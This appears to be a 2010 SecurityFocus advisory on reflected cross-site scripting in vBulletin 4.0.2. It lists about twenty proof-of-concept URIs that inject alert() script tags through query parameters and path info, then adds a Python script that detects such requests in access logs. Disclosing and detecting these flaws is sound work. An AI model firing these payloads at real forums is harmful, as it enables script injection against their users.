vBulletin 4.0.2 Multiple Cross Site Scripting Vulnerabilities

To exploit these issues, an attacker must entice an unsuspecting victim into following a malicious URI.

The following example URIs are available:

http://www.example.com/upload/calendar.php?acuparam=>"><ScRiPt>alert(213771818860)</ScRiPt>
http://www.example.com/upload/faq.php?acuparam=>"><ScRiPt>alert(213771818860)</ScRiPt>
http://www.example.com/upload/forum.php?acuparam=>"><ScRiPt>alert(213771818860)</ScRiPt>
http://www.example.com/upload/usercp.php/>"><ScRiPt>alert(213771818860)</ScRiPt>
http://www.example.com/upload/subscription.php?acuparam=>"><ScRiPt>alert(213771818860)</ScRiPt>
http://www.example.com/upload/showthread.php?acuparam=>"><ScRiPt>alert(213771818860)</ScRiPt>
http://www.example.com/upload/showgroups.php/>"><ScRiPt>alert(213771818860)</ScRiPt>
http://www.example.com/upload/sendmessage.php/>"><ScRiPt>alert(213771818860)</ScRiPt>
http://www.example.com/upload/search.php/>"><ScRiPt>alert(213771818860)</ScRiPt>
http://www.example.com/upload/register.php?acuparam=>"><ScRiPt>alert(213771818860)</ScRiPt>
http://www.example.com/upload/profile.php?acuparam=>"><ScRiPt>alert(213771818860)</ScRiPt>
http://www.example.com/upload/private.php?acuparam=>"><ScRiPt>alert(213771818860)</ScRiPt>
http://www.example.com/upload/online.php/>"><ScRiPt>alert(213771818860)</ScRiPt>
http://www.example.com/upload/newthread.php?acuparam=>"><ScRiPt>alert(213771818860)</ScRiPt>
http://www.example.com/upload/misc.php/>"><ScRiPt>alert(213771818860)</ScRiPt>
http://www.example.com/upload/memberlist.php?=>"'><ScRiPt>alert(213771818860)</ScRiPt>
http://www.example.com/upload/member.php/>"><ScRiPt>alert(213771818860)</ScRiPt>
http://www.example.com/upload/inlinemod.php?acuparam=>"><ScRiPt>alert(213771818860)</ScRiPt>
http://www.example.com/upload/index.php/>"><ScRiPt>alert(213771818860)</ScRiPt>
http://www.example.com/upload/forumdisplay.php?acuparam=>"><ScRiPt>alert(213771818860)</ScRiPt>
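
Added example, not part of the original advisory: a log check for the two request shapes in the list above, markup characters in the query string and in the path info after the script name. The log lines, addresses and function names are constructed for illustration, and it assumes a combined-format access log with percent-encoded request targets.

```python
import re
from urllib.parse import unquote

# Request target inside a combined-format access log entry.
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
# Splits a decoded path into the PHP script and any trailing path info.
SCRIPT = re.compile(r'(.*?\.php)(/.*)?$', re.I | re.S)
# Characters that let a reflected value close an attribute or open a tag.
MARKUP = re.compile(r'[<>"]')

def classify(target):
    """Return (script, [locations]) if the target carries markup, else None."""
    raw_path, _, raw_query = target.partition('?')
    m = SCRIPT.match(unquote(raw_path))
    if not m:
        return None  # not a request to a .php script
    script, path_info = m.group(1), m.group(2) or ''
    where = []
    if MARKUP.search(path_info):
        where.append('path-info')
    # The whole query is checked, so an empty parameter name is also covered.
    if MARKUP.search(unquote(raw_query)):
        where.append('query')
    return (script, where) if where else None

def scan(lines):
    """Return (client, script, locations) for every suspicious log line."""
    hits = []
    for line in lines:
        m = REQUEST.search(line)
        hit = classify(m.group(1)) if m else None
        if hit:
            hits.append((line.split()[0], hit[0], hit[1]))
    return hits

# Constructed sample log lines (documentation address ranges).
SAMPLE_LOG = [
    '198.51.100.7 - - [12/Feb/2010:10:01:02 +0000] "GET /upload/faq.php?acuparam=%3E%22%3E%3CScRiPt%3Ealert(1)%3C/ScRiPt%3E HTTP/1.1" 200 5120',
    '198.51.100.7 - - [12/Feb/2010:10:01:05 +0000] "GET /upload/usercp.php/%3E%22%3E%3CScRiPt%3Ealert(1)%3C/ScRiPt%3E HTTP/1.1" 200 4811',
    '203.0.113.9 - - [12/Feb/2010:10:02:11 +0000] "GET /upload/showthread.php?t=42&page=2 HTTP/1.1" 200 9100',
    '203.0.113.9 - - [12/Feb/2010:10:02:40 +0000] "GET /upload/memberlist.php?=%3E%22%27%3E%3CScRiPt%3Ealert(1)%3C/ScRiPt%3E HTTP/1.1" 200 7003',
]

if __name__ == '__main__':
    for client, script, where in scan(SAMPLE_LOG):
        print(client, script, ','.join(where))
```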


 

Copyright 2010, SecurityFocus